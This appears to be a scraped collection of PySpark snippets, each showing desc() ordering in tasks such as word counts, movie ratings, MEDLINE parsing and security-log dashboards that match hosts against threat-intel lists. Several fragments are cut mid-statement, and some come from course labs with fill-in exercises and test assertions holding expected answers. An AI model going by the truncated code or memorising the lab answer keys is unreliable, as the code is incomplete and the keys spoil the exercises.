def create_tag_frequencies(self, dataframe):
        """Produces a PySpark dataframe containing a column representing the total frequency of the tags by record.

        The frequency of tags is determined by their proportion of the total number of tags in the dataframe.

        :param dataframe: the PySpark dataframe
        :returns: the PySpark dataframe containing the tag frequency field and all fields in the supplied dataframe
        """
        df_tags = dataframe.selectExpr("tag1 AS tag").union(dataframe.selectExpr("tag2 AS tag")).union(dataframe.selectExpr("tag3 AS tag")) \
                           .union(dataframe.selectExpr("tag4 AS tag")).union(dataframe.selectExpr("tag5 AS tag"))
        df_tags = df_tags.na.drop(subset=["tag"])
        tags_total_count = df_tags.count()
        print("Total number of tags used, including duplicates:",tags_total_count)
        df_tag_freq = df_tags.groupBy("tag").count().orderBy(desc("count"))
        df_tag_freq = df_tag_freq.withColumn("frequency", col("count")/tags_total_count)
        df_tag_freq.orderBy(desc("frequency")).show(10)

        def one_hot_encode_top_n_tags(dataframe,n):
            """Produces a PySpark dataframe containing columns indicating whether each of the top n tags are present.

            :param dataframe: the PySpark dataframe 
            :param n: the number of the top ranked tags to return as tag fields
            :returns: the PySpark dataframe containing the top n tag fields and all fields in the supplied dataframe
            """
            top_n = [t.tag for t in df_tag_freq.orderBy(desc("frequency")).select("tag").limit(n).collect()]
            for tag in top_n:
                # replace tag name ".net" with "dotnet", for example, to avoid problems with periods in tag names
                tag_column_name = ("tag_"+tag).replace(".","dot")
                dataframe = dataframe.withColumn(tag_column_name, array_contains(dataframe.tags_split, tag).cast("int"))
            return dataframe

        dataframe = one_hot_encode_top_n_tags(dataframe,20)
        tag_columns = [c for c in dataframe.columns if c.startswith('tag')]

        print("Tag-related columns")
        dataframe.select(tag_columns).show(10,False)

        dataframe.createOrReplaceTempView('df')
        df_tag_freq.createOrReplaceTempView('df_tag_freq')

        for n in range(1,6):
            dataframe = self.sqlContext.sql("SELECT df.*, df_tag_freq.frequency AS frequency_tag{} FROM df LEFT JOIN df_tag_freq ON df.tag{} = df_tag_freq.tag".format(n,n))
            dataframe = dataframe.na.fill({"frequency_tag{}".format(n): 0})
            dataframe.createOrReplaceTempView('df')

        dataframe = dataframe.withColumn("frequency_sum", col("frequency_tag1")+col("frequency_tag2")+col("frequency_tag3")+col("frequency_tag4")+col("frequency_tag5"))

        # Remove temporary columns
        dataframe = dataframe.select([c for c in dataframe.columns if c not in {"tags_split","tag1","tag2","tag3","tag4","tag5","frequency_tag1","frequency_tag2", \
                                      "frequency_tag3","frequency_tag4","frequency_tag5"}])
        return(dataframe)
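# Note (not part of the original snippet): the method above relies on
#   from pyspark.sql.functions import array_contains, col, desc
# Hypothetical usage sketch -- the input dataframe must carry tag1..tag5 columns and a
# tags_split array column, and self.sqlContext must be set; names here are illustrative:
#   df_featurized = feature_builder.create_tag_frequencies(df_questions)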
def process_file(date_update):
    """Process downloaded MEDLINE folder to parquet file"""
    print("Process MEDLINE file to parquet")
    # remove the output folders if they still exist
    for stale_path in glob(os.path.join(save_dir, 'medline_*.parquet')):
        subprocess.call(['rm', '-rf', stale_path])

    date_update_str = date_update.strftime("%Y_%m_%d")
    path_rdd = sc.parallelize(glob(os.path.join(download_dir, 'medline*.xml.gz')), numSlices=1000)
    parse_results_rdd = path_rdd.\
        flatMap(lambda x: [Row(file_name=os.path.basename(x), **publication_dict)
                           for publication_dict in pp.parse_medline_xml(x)])
    medline_df = parse_results_rdd.toDF()
    medline_df.write.parquet(os.path.join(save_dir, 'medline_raw_%s.parquet' % date_update_str),
                             mode='overwrite')

    window = Window.partitionBy(['pmid']).orderBy(desc('file_name'))
    windowed_df = medline_df.select(
        max('delete').over(window).alias('is_deleted'),
        rank().over(window).alias('pos'),
        '*')
    windowed_df.\
        where('is_deleted = False and pos = 1').\
        write.parquet(os.path.join(save_dir, 'medline_lastview_%s.parquet' % date_update_str),
                      mode='overwrite')

    # parse grant database
    parse_grant_rdd = path_rdd.flatMap(lambda x: pp.parse_medline_grant_id(x))\
        .filter(lambda x: x is not None)\
        .map(lambda x: Row(**x))
    grant_df = parse_grant_rdd.toDF()
    grant_df.write.parquet(os.path.join(save_dir, 'medline_grant_%s.parquet' % date_update_str),
                           mode='overwrite')
# Example 3
    def getProxyIntelHits(self, fromdate, todate):
        '''
        :return:
        '''
        self.proxyDF = self.buildParquetFileList('proxysg', fromdate, todate)
        self.sc.setLocalProperty("spark.scheduler.pool", "dashboard")
        self.proxyDF.createOrReplaceTempView('proxysg')
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/otx').createOrReplaceTempView('otx')
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/c2').createOrReplaceTempView('c2')

        #self.proxyDF.persist(StorageLevel.MEMORY_AND_DISK_SER)

        sgotx = self.session.sql('select proxysg.host from proxysg join otx on otx.ip=proxysg.host')
        sgc2 = self.session.sql('select proxysg.host from proxysg join c2 on c2.host=proxysg.host')
        sgall = sgotx.unionAll(sgc2)

        # This breaks the Kryo serializer - unknown class
        entries = sgall.groupBy(sgall.host).count().orderBy(desc('count')).limit(20).collect()

        # Build json object for the table
        data = []
        descriptionTable = {
            "host": ("string", "Malware host"),
            "count": ("number", "Hits")
        }

        for entry in entries:
            data.append({"host": entry.host, "count": int(entry[1])})

        data_table = gviz_api.DataTable(descriptionTable)
        data_table.LoadData(data)
        # Creating a JSon string
        jsonTable = data_table.ToJSon(columns_order=("host", "count"), order_by="count")

        return jsonTable
 def makeWordCloud(row, df):
     rows = df.filter(df['subreddit'] == row['subreddit']).orderBy(desc('score'))
     count = rows.count()
     if count > 50:
         # map rows to (term, score) tuples for the word cloud
         frequencies = [(r['term'], r['score']) for r in rows.select('term', 'score').take(max(count, 500))]
         save_word_cloud(row['subreddit'], frequencies)
def pagerank_topk(ranks_in, k=10):
    '''retrieve the top 'k' pagerank vertices and their associated metadata'''
    df_rank_slice = ranks_in.vertices.select('id', 'department', 'type', 'pagerank')\
                            .orderBy(desc("pagerank"))\
                            .limit(k)
    df_ranks = df_rank_slice.toPandas().sort_values(by='pagerank', ascending=False)
    df_ranks.id = df_ranks.id.astype('int64')  # Python 3 has no 'long' type
    return df_ranks
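# Hypothetical usage sketch, assuming `g` is a GraphFrame whose vertices carry
# 'department' and 'type' columns alongside 'id':
#   ranks = g.pageRank(resetProbability=0.15, maxIter=10)
#   top10 = pagerank_topk(ranks, k=10)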
# Example 6
def compute(day):
    # We want days day-30 through day-1
    sums = wikipediadata.where(
            (wikipediadata.day >= day-30) & (wikipediadata.day <= day-1))

    # Test subset
    #sums = sums.where((sums.page == 'Cadillac_Brougham') | ((sums.page == 'Roald_Dahl') & (sums.projectcode == 'fr')))

    # Sum the hourly counts within each day
    sums = sums.groupby('projectcode', 'page', 'day').sum('views')
    # Cache for later use
    sums.cache()

    # define a window := previous day
    window_spec =  Window.partitionBy(sums.projectcode, sums.page) \
            .orderBy(sums.day.asc()).rowsBetween(-1, -1)

    # compute the difference views(d) - views(d-1)
    diffs = sums.withColumn('diff', sums.views - F.sum(sums.views) \
            .over(window_spec))

    # compute the coefficients to apply to each day
    coefs = pd.DataFrame({'day': range(day-30, day)})
    coefs['coef'] = 1. / (day - coefs.day)

    coefs = hc.createDataFrame(coefs)
    diffs = diffs.join(coefs, 'day')

    # compute each day's score
    diffs = diffs.withColumn('sub_score', diffs.diff * diffs.coef)

    totals = diffs.groupby('projectcode', 'page').sum('views', 'sub_score')
    # normalize by the square root of the sum of views
    totals = totals.withColumn('score',
            totals['SUM(sub_score)'] / F.sqrt(totals['SUM(views)'])) \
            .orderBy(F.desc('score')) \
            .withColumnRenamed('SUM(views)', 'total_views') \
            .limit(10)

    views = sums.select('projectcode', 'page', 'day', 'views') \
           .join(totals.select('projectcode', 'page', 'total_views', 'score'), 
                  (totals.projectcode == sums.projectcode) & (totals.page == sums.page), 'right_outer')

    df = totals.select('projectcode', 'page', 'total_views', 'score').toPandas()
    df2 = views.toPandas()
    df2 = df2.iloc[:, 2:]
    df2 = df2.pivot_table(values='views', columns=['day'], index=['projectcode', 'page'], fill_value=0)
    df = df.merge(df2, left_on=['projectcode', 'page'], right_index=True)
    df.to_csv(filename(day), index=False)
    
    # clear the cache
    hc.clearCache()
# Example 8
    def getVPNUnusualActivity(self):
        self.sc.setLocalProperty("spark.scheduler.pool", "dashboard")

        adlocation = self.session.read.csv(header='true', inferSchema='true', path='/user/jleaniz/ad.csv')
        adlocation.cache()

        vpn = self.session.read.parquet('/data/srm/dbs/dw_srm.db/ciscovpn').rdd
        vpn.cache()

        def func(x):
            gi = GeoIP.open("GeoIP.dat",GeoIP.GEOIP_MEMORY_CACHE)
            cc = gi.country_code_by_addr(x.remoteip)
            return Row(bytesrcv=x.bytesrcv, bytesxmt=x.bytesxmt, duration=x.duration, localip=x.localip, reason=x.reason,
                       remoteip=x.remoteip, source=x.source, time=x.time, user=x.user, date=x.date, remoteipcc=cc)

        vpnDF = vpn.map(func).toDF()
        joinDF = vpnDF.join(adlocation, vpnDF.user == adlocation.EmailAddress)
        joinDF.cache()

        fromOtherLocations = joinDF.filter("remoteipcc <> c")
        groupDF = fromOtherLocations.groupBy(fromOtherLocations.user, fromOtherLocations.remoteip, fromOtherLocations.remoteipcc, fromOtherLocations.c)\
            .count()\
            .orderBy(desc('count'))
        entries = groupDF.collect()

        # Build json object for the table
        dataChart = []
        descriptionChart = {
            "user": ("string", "User"),
            "c": ("string", "Office"),
            "remoteip": ("string", "Remote IP"),
            "remoteipcc": ("string", "Remote IP CC"),
            "count": ("number", "Count")
        }

        for entry in entries:
            dataChart.append({
                "user": entry.user,
                "c": entry.c,
                "remoteip": entry.remoteip,
                "remoteipcc": entry.remoteipcc,
                "count": int(entry[4])})

        data_tableChart = gviz_api.DataTable(descriptionChart)
        data_tableChart.LoadData(dataChart)
        # Creating a JSon string
        vpn_logins = data_tableChart.ToJSon(
            columns_order=("user", "c", "remoteip","remoteipcc","count"),
            order_by="count"
        )
        return vpn_logins
# Example 9
def runOtherFunctions(spark, personDf):
    df = spark.createDataFrame([("v1", "v2", "v3")], ["c1", "c2", "c3"])

    # array
    df.select(df.c1, df.c2, df.c3, array("c1", "c2", "c3").alias("newCol")).show(truncate=False)

    # desc, asc
    personDf.show()
    personDf.sort(functions.desc("age"), functions.asc("name")).show()

    # pyspark 2.1.0 does not support desc_nulls_first, desc_nulls_last, asc_nulls_first, asc_nulls_last

    # split, length (in pyspark a column can be referenced as df["col"] or df.col)
    df2 = spark.createDataFrame([("Splits str around pattern",)], ['value'])
    df2.select(df2.value, split(df2.value, " "), length(df2.value)).show(truncate=False)

    # rownum, rank
    f1 = StructField("date", StringType(), True)
    f2 = StructField("product", StringType(), True)
    f3 = StructField("amount", IntegerType(), True)
    schema = StructType([f1, f2, f3])

    p1 = ("2017-12-25 12:01:00", "note", 1000)
    p2 = ("2017-12-25 12:01:10", "pencil", 3500)
    p3 = ("2017-12-25 12:03:20", "pencil", 23000)
    p4 = ("2017-12-25 12:05:00", "note", 1500)
    p5 = ("2017-12-25 12:05:07", "note", 2000)
    p6 = ("2017-12-25 12:06:25", "note", 1000)
    p7 = ("2017-12-25 12:08:00", "pencil", 500)
    p8 = ("2017-12-25 12:09:45", "note", 30000)

    dd = spark.createDataFrame([p1, p2, p3, p4, p5, p6, p7, p8], schema)
    w1 = Window.partitionBy("product").orderBy("amount")
    w2 = Window.orderBy("amount")
    dd.select(dd.product, dd.amount, functions.row_number().over(w1).alias("rownum"),
              functions.rank().over(w2).alias("rank")).show()
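    # Sketch (not in the original example): on PySpark 2.4+ the null-ordering variants
    # mentioned above are available, e.g.:
    # personDf.sort(functions.desc_nulls_last("age"), functions.asc_nulls_first("name")).show()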
# Example 10
    def getfwMalwareConns(self, fromdate, todate):

        self.fwDF = self.buildParquetFileList('fw', fromdate, todate)
        self.fwDF.createOrReplaceTempView('fw')
        #self.fwDF.persist(StorageLevel.MEMORY_AND_DISK_SER)
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/otx').createOrReplaceTempView('otx')
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/c2').createOrReplaceTempView('c2')

        self.sc.setLocalProperty("spark.scheduler.pool", "dashboard")
        fwotx = self.session.sql('select fw.dstip from fw join otx on otx.ip=fw.dstip')
        fwc2 = self.session.sql('select fw.dstip from fw join c2 on c2.host=fw.dstip')
        fwall = fwotx.unionAll(fwc2)

        groupcnt = fwall.groupBy(fwall.dstip).count().orderBy(desc('count'))

        entries = groupcnt.collect()

        # Build json object for the table
        dataChart = []
        descriptionChart = {
            "dstip": ("string", "Malicious host"),
            "count": ("number", "Hits")
        }

        for entry in entries:
            dataChart.append({"dstip": entry.dstip, "count": entry[1]})

        data_tableChart = gviz_api.DataTable(descriptionChart)
        data_tableChart.LoadData(dataChart)
        # Creating a JSon string
        fw_mal_conns = data_tableChart.ToJSon(
            columns_order=("dstip", "count"),
            order_by="count"
        )

        return fw_mal_conns
# Example 11
    .master("local") \
    .appName("cassandra Word Count") \
    .getOrCreate()

spark.sparkContext._conf.setAll([('spark.executor.memory', '4g'), \
                                 ('spark.executor.cores', '4'), \
                                 ('spark.cores.max', '4'), \
                                 ('spark.driver.memory','4g')])

# print(spark.sparkContext._conf.getAll())

spRDD = spark.createDataFrame(pdDF).cache()
# spRDD.printSchema()

# Count tweets by hashtag
countsByhashtags = spRDD.groupBy("hashtags").count().sort(desc("count"))
countsByhashtags.show(10)

onlyText = spRDD.select("tweet_text")
onlyText.show(5)

sparkRDD = onlyText.rdd

splitted = sparkRDD.flatMap(lambda line: str(line).split(' '))
# .reduce(lambda word : (word , 1))

reduced = splitted.map(lambda word : (str(word), 1)) \
    .reduceByKey(lambda a, b: a + b) \
        .sortBy(lambda a: -a[1])

topWords = reduced.collect()[:20]
csvDF = spark \
    .readStream \
    .option("sep", ";") \
    .schema(userSchema) \
    .csv("hdfs://localhost:9000/stream/")
'''words=csvDF.select(explode(split(csvDF.Hashtags,",")).alias("hashtag"))
	
wordcounts=words.groupBy("hashtag").count().select("hashtag","count")
wc=wordcounts.orderBy(desc("count")).select("hashtag")
#ws=wordcounts..show(10)
'''
ratio = csvDF.select("name",
                     (col("Followers") / col("Friends")).alias("FRRatio"))
ratio = ratio.groupBy("name", "FRRatio").count()
r = ratio.orderBy(desc("FRRatio")).select(col("name"), col("FRRatio")).limit(1)
#ratio = csvDF.select("ratio")
#print("sorted bruh")
query=r \
 .writeStream \
 .outputMode ("append") \
 .format("console") \
 .start()
query.awaitTermination(60)
query.stop()
'''
	
s=csvDF.groupBy("Hashtags").count() \
  .writeStream \
  .outputMode("complete") \
  .format("console") \
'''
# Example 13
print("生成数据list")
rows =[Row(name="Jack", age="37", group="qe"),
    Row(name="John", age="25", group="qe"),
    Row(name="Tom", age="34", group="qa"),
    Row(name="Phoenix", age="29", group="qe"),
    Row(name="Rose", age="23", group="qa")]
sc = SparkContext()
sqlContext = SQLContext(sc)

print("####生成DataFrame####")
data = sqlContext.createDataFrame(rows)

print("####展示数据####")
data.show()

print("####打印schema模式名称####")
data.printSchema()

print("####选择某一列查看####")
data.select("name").show()
data.select("name","age",col("group").alias("Group")).show()

print("####根据条件筛选显示####")
data.filter(col("age") >= 32).orderBy("name").show()
data.select("name","age").where(col("age") >= 32).orderBy("name").show()
data.select("name","age").where(col("age") >= 32).orderBy(desc("name"),"age").show()

print("####对DataFrame进行分组和函数计算####")
data.groupBy("group").count().show()
data.groupBy("group").agg(avg("age")).show()
yelp_df.filter(yelp_df.useful >= 1).count()
yelp_df.filter('useful >= 1').count()

# select - subset of data
yelp_df.select("useful")
yelp_df.select("useful").agg({"useful" : "max"}).collect()

# scale
yelp_df.select("id", yelp_df.useful/28*100).show(5)
yelp_df.select("id", (yelp_df.useful/28*100).cast('int')).show(5)

# rename
yelp_df.select("id", (yelp_df.useful/28*100).cast('int').alias('useful_pct')).show(5)

# order
useful_perc_data = yelp_df.select(yelp_df["id"].alias('uid'), (yelp_df.useful/28*100).cast('int').alias('useful_pct')).orderBy(desc('useful_pct'))

# join + select
useful_perc_data.join(
	yelp_df,
	yelp_df.id == useful_perc_data.uid,
	"inner").select(useful_perc_data.uid, "useful_pct", "review_count").show(5)

# cache - after caching, second run became much faster
useful_perc_data.join(
	yelp_df,
	yelp_df.id == useful_perc_data.uid,
	"inner").cache().select(useful_perc_data.uid, "useful_pct", "review_count").show(5)

# logs
# set delimiter to windows line end
from pyspark.sql import SparkSession
from pyspark.sql import functions as func
from pyspark.sql.types import StructType, StructField, StringType, IntegerType, FloatType, LongType
from pyspark.sql.functions import count

import os
spark = SparkSession.builder.appName("MinTemperatures").getOrCreate()
schema = StructType([
    StructField("userID", IntegerType(), True),
    StructField("movieID", IntegerType(), True),
    StructField("rating", IntegerType(), True),
    StructField("timestamp", LongType(), True)
])
# Read file as dataframe
curwd = os.getcwd()
df = spark.read.option(
    "sep", "\t").schema(schema).csv(f"file:///{curwd}/datasets/ml-100k/u.data")
print("printing schema: ")
df.printSchema()
# topMoviesIDs = df.groupBy("movieID").count().orderBy(func.desc("count"))
topMoviesIDs = df.groupBy("movieID").agg(
    count("timestamp").alias("countzer")).orderBy(func.desc("countzer"))
topMoviesIDs.show(10)
# kill session
spark.stop()
    def getPieColInfo(self, numerical):
        # If user selects a column in dialog box, give it to them
        keyFields = self.options.get("keyFields")
        if keyFields is not None:
            return keyFields

        schema = self.entity.schema
        default=None
        for field in schema.fields:
            # Ignore unique ids
            if field.name.lower() != 'id' and ( not numerical or isNum(field.dataType.__class__.__name__) ):
            # Find a good column to display in pie ChartDisplay
                default = default or field.name
                count = self.entity.count()
                sample = self.entity.sample(False, (float(200) / count)) if count > 200 else self.entity
                orderedSample = sample.groupBy(field.name).agg(F.count(field.name).alias("agg")).orderBy(F.desc("agg")).select("agg")
                if orderedSample.take(1)[0]["agg"] > 10:
                    return field.name
        # Otherwise, return first non-id column
        return default
# TEST Remove empty elements (4d)
Test.assertEquals(shakeWordsDF.count(), 882996, 'incorrect value for shakeWordCount')
Test.assertEquals(shakeWordsDF.columns, ['word'], "shakeWordsDF should only contain the Column 'word'")

# COMMAND ----------

# MAGIC %md
# MAGIC ** (4e) Count the words **
# MAGIC
# MAGIC We now have a DataFrame that is only words.  Next, let's apply the `wordCount()` function to produce a list of word counts. We can view the first 20 words by using the `show()` action; however, we'd like to see the words in descending order of count, so we'll need to apply the [`orderBy` DataFrame method](http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrame.orderBy) to first sort the DataFrame that is returned from `wordCount()`.
# MAGIC
# MAGIC You'll notice that many of the words are common English words. These are called stopwords. In a later lab, we will see how to eliminate them from the results.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code

from pyspark.sql.functions import desc
topWordsAndCountsDF = wordCount(shakeWordsDF).orderBy(desc('count'))
topWordsAndCountsDF.show()

# COMMAND ----------

# TEST Count the words (4e)
Test.assertEquals(topWordsAndCountsDF.take(15),
                  [(u'the', 27361), (u'and', 26028), (u'i', 20681), (u'to', 19150), (u'of', 17463),
                   (u'a', 14593), (u'you', 13615), (u'my', 12481), (u'in', 10956), (u'that', 10890),
                   (u'is', 9134), (u'not', 8497), (u'with', 7771), (u'me', 7769), (u'it', 7678)],
                  'incorrect value for top15WordsAndCountsDF')
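# COMMAND ----------

# MAGIC %md
# MAGIC A minimal sketch (not part of this lab) of how the stopwords mentioned above could be filtered out, assuming `shakeWordsDF` has a single string column `word` and using a small hand-picked stopword list:

# COMMAND ----------

stopwords = ['the', 'and', 'i', 'to', 'of', 'a', 'you', 'my', 'in', 'that']
shakeWordsNoStopDF = shakeWordsDF.filter(~shakeWordsDF.word.isin(stopwords))
wordCount(shakeWordsNoStopDF).orderBy(desc('count')).show()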
    print('Number of Method=\'Discover\': ', df.filter(df.Method == 'Discover').count())

    '''
    Can be written like this as well,

    >>> from pyspark.sql.functions import sum
    >>> for row in df.groupBy(df.Method).agg(sum(df.Amount))\
            .withColumnRenamed('sum(Amount)', 'Total')\
            .orderBy('Total', ascending=False)\
            .take(3):
            print(row)
    '''
    print('>>> Top 3 Methods using Dataframe API >>>')
    for row in df.groupBy(df.Method).sum()\
        .withColumnRenamed('sum(Amount)', 'Total')\
        .orderBy(desc('Total'))\
        .take(3):
        print(row)

    print('>>> Top 3 Methods using SQL >>>')
    df.createOrReplaceTempView('temp')
    sql_str = 'select Method, sum(Amount) as Total from temp group by Method order by Total desc'
    for row in spark.sql(sql_str).take(3):
        print(row)

    # code for cleaning up memory...
    spark.catalog.dropTempView("temp")
    df.unpersist()
        
# Example 19
# COMMAND ----------

# TODO

FILL_IN

# COMMAND ----------

# TEST - Run this cell to test your solution
from pyspark.sql.functions import desc

ipCountDF2 = (spark
  .read
  .parquet("/tmp/ipCount.parquet")
  .orderBy(desc("count"))
)
ip1, count1 = ipCountDF2.first()
cols = set(ipCountDF2.columns)

dbTest("ET1-P-02-02-01", "213.152.28.bhe", ip1)
dbTest("ET1-P-02-02-02", True, count1 > 500000 and count1 < 550000)
dbTest("ET1-P-02-02-03", {'count', 'ip'}, cols)

print("Tests passed!")

# COMMAND ----------

# MAGIC %md
# MAGIC Check the load worked by using `%fs ls <path>`.  Parquet divides your data into a number of files.  If successful, you see a `_SUCCESS` file as well as the data split across a number of parts.
# MAGIC %md
# MAGIC ### (5c) Exercise: Listing the Top Twenty 404 Response Code paths
# MAGIC
# MAGIC Using the DataFrame containing only log records with a 404 response code that you cached in part (5a), print out a list of the top twenty paths that generate the most 404 errors.
# MAGIC
# MAGIC *Remember, top paths should be in sorted order*

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code

top_20_not_found_df = (not_found_paths_df
                       .groupBy('path')
                       .count()
                       .sort(desc('count')))

print 'Top Twenty 404 URLs:\n'
top_20_not_found_df.show(n=20, truncate=False)

# COMMAND ----------

# TEST Top twenty 404 URLs (5c)

top_20_not_found = [(row[0], row[1]) for row in top_20_not_found_df.take(20)]
top_20_expected = [
 (u'/pub/winvn/readme.txt', 633),
 (u'/pub/winvn/release.txt', 494),
 (u'/shuttle/missions/STS-69/mission-STS-69.html', 430),
 (u'/images/nasa-logo.gif', 319),
 (u'/elv/DELTA/uncons.htm', 178),
ratings_df = ratings_df.withColumn(
    'Timestamp',
    F.col('SplitValues').getItem(3).cast(IntegerType()))
ratings_df = ratings_df.drop(F.col('SplitValues'))
'''
# Import users.dat
users_df = spark.read.format("csv").load("data/users.dat")
users_df = users_df.select(F.split(users_df.columns[0], "::").alias('SplitValues'))
users_df = users_df.withColumn('UserID', F.col('SplitValues').getItem(0).cast(IntegerType()))
users_df = users_df.withColumn('Gender', F.col('SplitValues').getItem(1))
users_df = users_df.withColumn('Age', F.col('SplitValues').getItem(2).cast(ByteType()))
users_df = users_df.withColumn('Occupation', F.col('SplitValues').getItem(3).cast(ByteType()))
users_df = users_df.withColumn('Zip-code', F.col('SplitValues').getItem(4).cast(IntegerType()))
users_df = users_df.drop(F.col('SplitValues'))
'''

# Calculate average rating
avgratings_df = ratings_df.select(F.col('MovieID'), F.col('Rating'))
avgratings_df = avgratings_df.groupBy(F.col('MovieID')).agg(
    F.mean(F.col('Rating')).alias('Average Rating'))
avgratings_df = avgratings_df.join(movies_df,
                                   avgratings_df.MovieID == movies_df.MovieID)

# Write the output to output/exercise1.csv
output_df = avgratings_df.select('Title', 'Average Rating').sort(
    F.desc("Average Rating"))
output_df.write.mode("overwrite").csv('output/exercise1/avgrating')
os.system(f'rm output/exercise1/avgrating.csv')
os.system(
    f'cat output/exercise1/avgrating/p* > output/exercise1/avgrating.csv')

# COMMAND ----------

from pyspark.sql.functions import col, to_date
dfWithDate = df.withColumn("date", to_date(col("InvoiceDate"), "MM/d/yyyy H:mm"))
dfWithDate.createOrReplaceTempView("dfWithDate")


# COMMAND ----------

from pyspark.sql.window import Window
from pyspark.sql.functions import desc
windowSpec = Window\
  .partitionBy("CustomerId", "date")\
  .orderBy(desc("Quantity"))\
  .rowsBetween(Window.unboundedPreceding, Window.currentRow)


# COMMAND ----------

from pyspark.sql.functions import max
maxPurchaseQuantity = max(col("Quantity")).over(windowSpec)


# COMMAND ----------

from pyspark.sql.functions import dense_rank, rank
purchaseDenseRank = dense_rank().over(windowSpec)
purchaseRank = rank().over(windowSpec)
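# COMMAND ----------

# A possible follow-up (sketch, not from the original notebook): select the window
# expressions defined above together, assuming dfWithDate carries CustomerId, date
# and Quantity columns.
dfWithDate.where("CustomerId IS NOT NULL").orderBy("CustomerId")\
  .select(
    col("CustomerId"),
    col("date"),
    col("Quantity"),
    purchaseRank.alias("quantityRank"),
    purchaseDenseRank.alias("quantityDenseRank"),
    maxPurchaseQuantity.alias("maxPurchaseQuantity"))\
  .show()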
# MAGIC Add a single DataFrame transformation (in place of `<FILL_IN>`, below) to limit the results to movies with ratings from at least 500 people.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code
movies_with_500_ratings_or_more = movie_names_with_avg_ratings_df.filter(movie_names_with_avg_ratings_df['count'] >= 500)
print 'Movies with highest ratings:'
movies_with_500_ratings_or_more.show(20, truncate=False)

# COMMAND ----------

# TEST Movies with Highest Average Ratings and at least 500 Reviews (1b)

Test.assertEquals(movies_with_500_ratings_or_more.count(), 4489,
                  'incorrect movies_with_500_ratings_or_more.count(). Expected 4489.')
top_20_results = [(r['average'], r['title'], r['count']) for r in movies_with_500_ratings_or_more.orderBy(F.desc('average')).take(20)]

Test.assertEquals(top_20_results,
                  [(4.446990499637029, u'Shawshank Redemption, The (1994)', 63366),
                   (4.364732196832306, u'Godfather, The (1972)', 41355),
                   (4.334372207803259, u'Usual Suspects, The (1995)', 47006),
                   (4.310175010988133, u"Schindler's List (1993)", 50054),
                   (4.275640557704942, u'Godfather: Part II, The (1974)', 27398),
                   (4.2741796572216, u'Seven Samurai (Shichinin no samurai) (1954)', 11611),
                   (4.271333600779414, u'Rear Window (1954)', 17449),
                   (4.263182346109176, u'Band of Brothers (2001)', 4305),
                   (4.258326830670664, u'Casablanca (1942)', 24349),
                   (4.256934865900383, u'Sunset Blvd. (a.k.a. Sunset Boulevard) (1950)', 6525),
                   (4.24807897901911, u"One Flew Over the Cuckoo's Nest (1975)", 29932),
                   (4.247286821705426, u'Dr. Strangelove or: How I Learned to Stop Worrying and Love the Bomb (1964)', 23220),
                   (4.246001523229246, u'Third Man, The (1949)', 6565),
display(g.outDegrees)

# COMMAND ----------

display(g.degrees)

# COMMAND ----------

display(g.edges.filter("dst = '4' and HelpfulnessDenominator > 60"))

# COMMAND ----------

result = g.stronglyConnectedComponents(maxIter = 10)
display(result.select("id", "Component"))

# COMMAND ----------

ranks = g.pageRank(resetProbability= 0.15, maxIter = 5)
display(ranks.vertices.orderBy(ranks.vertices.pagerank.desc()).limit(100))
# display(ranks.vertices.orderBy(desc("pagerank")))

# COMMAND ----------

from pyspark.sql.functions import desc
display(g.edges.filter("Score = '4'").groupBy("src", "dst").avg("HelpfulnessDenominator").sort(desc("avg(HelpfulnessDenominator)")).limit(100))

# COMMAND ----------


# Example 25
                     StructField("movieID", IntegerType(), True), \
                     StructField("rating", IntegerType(), True), \
                     StructField("timestamp", LongType(), True)])

# Load up movie data as dataframe
moviesDF = spark.read.option("sep", "\t").schema(schema).csv(
    "file:///opt/bitnami/spark/datasets/ml-100k/u.data")

movieCounts = moviesDF.groupBy("movieID").count()
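# The broadcast dictionary `nameDict` used by lookupName() below is not shown in this
# snippet; a minimal sketch of how it might be built from the ml-100k u.item file
# (file path assumed):
def loadMovieNames():
    movieNames = {}
    with open("ml-100k/u.item", encoding="ISO-8859-1") as f:
        for line in f:
            fields = line.split('|')
            movieNames[int(fields[0])] = fields[1]
    return movieNames

nameDict = spark.sparkContext.broadcast(loadMovieNames())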


# Create a user-defined function to look up movie names from our broadcasted dictionary
def lookupName(movieID):
    return nameDict.value[movieID]


lookupNameUDF = func.udf(lookupName)

# Add a movieTitle column using our new udf
moviesWithNames = movieCounts.withColumn("movieTitle",
                                         lookupNameUDF(func.col("movieID")))

# Sort the results
sortedMoviesWithNames = moviesWithNames.orderBy(func.desc("count"))

# Grab the top 10
sortedMoviesWithNames.show(10, False)

# Stop the session
spark.stop()
# Example 26
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
import pandas as pd
from pyspark.sql.functions import desc


spark = SparkSession \
    .builder \
    .appName("Python NBA Salaries") \
    .getOrCreate()

df = spark.read.csv("NBACleanData/StatsClean.csv", header=True)
df.createOrReplaceTempView("stats")

df2 = spark.sql("SELECT Pos, SUM(PTS) AS total_points FROM stats GROUP BY Pos")

df2 = df2.sort(desc("total_points"))
df2.show()

pandasDF = df2.toPandas()
pandasDF.rename(columns={'total_points': 'Points'},inplace=True)


pandasDF.to_csv('NBACleanData/AlltimeScoringPos.csv', index=False)

# Example 27
def get_recommendations_by_cluster_app(cluster, purchased_quantities):

    # Existing customer products
    customer_products = []
    for i in range(0, len(product_cols)):
        if purchased_quantities[i] > 0:
            customer_products.append((product_cols[i], purchased_quantities[i]))

    df_customer_products = sc.parallelize(customer_products).toDF(["PRODUCT", "COUNT"])

    # Get popular products in the cluster
    cluster_products = get_popular_products_in_cluster(cluster)
    df_cluster_products = sc.parallelize(cluster_products).toDF(["PRODUCT", "COUNT"])

    # Filter out products the user has already purchased
    df_recommended_products = df_cluster_products.alias('cl').join(
        df_customer_products.alias('cu'),
        df_cluster_products['PRODUCT'] == df_customer_products['PRODUCT'],
        'leftouter')
    df_recommended_products = df_recommended_products.filter('cu.PRODUCT IS NULL') \
        .select('cl.PRODUCT', 'cl.COUNT').sort(desc('cl.COUNT'))

    return df_recommended_products
 def question_two(self, spark):
     rawDF = self.question_one(spark, data_only=True)
     rawDF.groupBy("company")\
          .agg(round(sum("purchase_cost"), 2).alias("revenue"))\
          .orderBy(desc("revenue"))\
          .show(10)
# Example 29
# Create KM model and fit using up to date data
